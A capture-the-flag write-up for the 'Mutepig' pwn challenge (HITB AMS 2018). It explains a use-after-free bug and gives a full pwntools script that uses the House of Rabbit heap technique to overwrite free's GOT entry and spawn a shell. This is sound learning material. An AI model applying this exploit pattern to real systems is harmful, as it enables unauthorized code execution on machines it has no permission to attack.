XCTF HITB AMS 2018 PWN Mutepig Write-up

Introduction

This challenge seems to be the first seen House of Rabbit in CTF competition. This challenge follows the sample code given in [1]. More details on House of Rabbit are given in my previous post House-of-Rabbit.

Vulnerability Analysis

There exists a classical use-after-free vulnerability in the delete function. An entry is not removed from the list after free.

Exploit Plan

Since there is no any output function. We need to use House of Rabbit to overwrite function pointer at free@plt to 0x4006e0 and trigger system(“/bin/sh”) in the end.

Exploit

from pwn import *
import time

DEBUG = int(sys.argv[1]);

if(DEBUG == 0):
    r = remote("1.2.3.4", 2333);
elif(DEBUG == 1):
    r = process("./mutepig");
elif(DEBUG == 2):
    r = process("./mutepig");
    gdb.attach(r, '''source ./script''');

#sizeoption:
#1: fast  (0x10)
#2: small (0x80)
#3: large (0xa00000)
#13337: magic
#else: nagative

def create(sizeoption, payload):
    time.sleep(0.2);
    r.sendline("1");
    r.sendline(str(sizeoption));
    r.send(payload.ljust(7, '\x00'));

def delete(index):
    time.sleep(0.2);
    r.sendline("2");
    r.sendline(str(index));


def modify(index, payload1, payload2):
    time.sleep(0.2);
    r.sendline("3");
    r.sendline(str(index));
    r.send(payload1.ljust(0x7, '\x00'));
    r.send(payload2);


def exploit():
    create(3, "A"*4); #0
    delete(0);
    create(3, "B"*4); #1
    delete(1);

    create(1, "C"*4); #2
    create(2, "D"*4); #3

    delete(2);
    
    modify(2, p32(0x602130), p64(0) + p64(0x11) + p64(0) + p64(0xfffffffffffffff1));

    delete(3);

    modify(3, "E"*4, p64(0xfffffffffffffff0) + p64(0x10) + p64(0x0) + p64(0xa00001));

    create(3, "F"*4);

    modify(3, "G"*4, p64(0xfffffffffffffff0) + p64(0x10) + p64(0x0) + p64(0xfffffffffffffff1));

    create(13337, "/bin/sh");

    create(1, p32(0x602018)); #0

    modify(0, p32(0x4006e0), p64(0))

    modify(6, "/bin/sh", p64(0));
    delete(6);
    r.interactive();

exploit();

Reference

[1] http://shift-crops.hatenablog.com/entry/2017/09/16/001126

Advertisements
Categories: pwn

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.